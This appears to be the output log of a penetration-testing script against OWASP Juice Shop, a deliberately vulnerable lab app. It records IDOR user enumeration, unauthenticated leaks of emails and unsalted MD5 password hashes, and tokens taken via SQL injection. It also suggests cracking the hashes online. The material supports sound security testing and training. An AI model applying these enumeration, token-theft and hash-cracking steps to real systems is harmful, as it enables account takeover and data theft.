============================================================
F-004: Broken Access Control / IDOR - OWASP Juice Shop
Target: http://localhost:3000
============================================================

[PHASE 1] Obtaining tokens via SQL injection bypass
  Admin token (id=1): eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ...
  User token  (id=3): eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ...

[F-004-A] IDOR: GET /api/Users/{id} as regular user
  Requesting /api/Users/1 with user token (bender, id=3)...
  [VULNERABLE] HTTP 200
  Victim id:    1
  Victim email: admin@juice-sh.op
  Victim role:  admin

[F-004-B] Unauthenticated /rest/memories - Password Hash Leak
  Requesting /rest/memories (no auth)...
  [VULNERABLE] HTTP 200 - 10 memories, 10 password hashes leaked
  email=bjoern@owasp.org hash=9283f1b2e9669749081963be0462e466 role=deluxe
  email=bjoern.kimminich@gmail.com hash=6edd9d726cbdc873c539e41ae8757b8c role=admin
  email=bjoern.kimminich@gmail.com hash=6edd9d726cbdc873c539e41ae8757b8c role=admin

[F-004-C] Broken Access Control: /rest/user/authentication-details/
  Requesting as regular user (bender, role=customer)...
  [VULNERABLE] HTTP 200 - 21 users returned to regular user
  id=1 email=admin@juice-sh.op role=admin
  id=2 email=jim@juice-sh.op role=customer
  id=3 email=bender@juice-sh.op role=customer
  id=4 email=bjoern.kimminich@gmail.com role=admin
  id=5 email=ciso@juice-sh.op role=deluxe
  ... and 16 more users

[F-004-D] Information Disclosure: /api/Challenges/ (no auth)
  [VULNERABLE] HTTP 200 - 111 challenges exposed without auth
  Categories exposed:
    Broken Access Control: 11 challenges
    Broken Anti Automation: 4 challenges
    Broken Authentication: 9 challenges
    Cryptographic Issues: 5 challenges
    Improper Input Validation: 12 challenges
    Injection: 11 challenges
    Insecure Deserialization: 3 challenges
    Miscellaneous: 7 challenges
    Observability Failures: 4 challenges
    Security Misconfiguration: 4 challenges
    Security through Obscurity: 3 challenges
    Sensitive Data Exposure: 16 challenges
    Unvalidated Redirects: 2 challenges
    Vulnerable Components: 9 challenges
    XSS: 9 challenges
    XXE: 2 challenges

[BONUS] IDOR User Enumeration (id 1-10):
  /api/Users/1 -> admin@juice-sh.op (admin)
  /api/Users/2 -> jim@juice-sh.op (customer)
  /api/Users/3 -> bender@juice-sh.op (customer)
  /api/Users/4 -> bjoern.kimminich@gmail.com (admin)
  /api/Users/5 -> ciso@juice-sh.op (deluxe)
  /api/Users/6 -> support@juice-sh.op (admin)
  /api/Users/7 -> morty@juice-sh.op (customer)
  /api/Users/8 -> mc.safesearch@juice-sh.op (customer)
  /api/Users/9 -> J12934@juice-sh.op (admin)
  /api/Users/10 -> wurstbrot@juice-sh.op (admin)
  Total users enumerated: 10

============================================================
SUMMARY
============================================================
  F-004-A: VULNERABLE
  F-004-B: VULNERABLE
  F-004-C: VULNERABLE
  F-004-D: VULNERABLE

Password hashes leaked (sample, MD5 - no salt):
  bjoern@owasp.org: 9283f1b2e9669749081963be0462e466
  bjoern.kimminich@gmail.com: 6edd9d726cbdc873c539e41ae8757b8c
  -> Crack at: https://crackstation.net/ (offline, do not submit to external sites in real engagements)

4/4 sub-findings confirmed VULNERABLE
Severity: CRITICAL (CVSS 9.1)
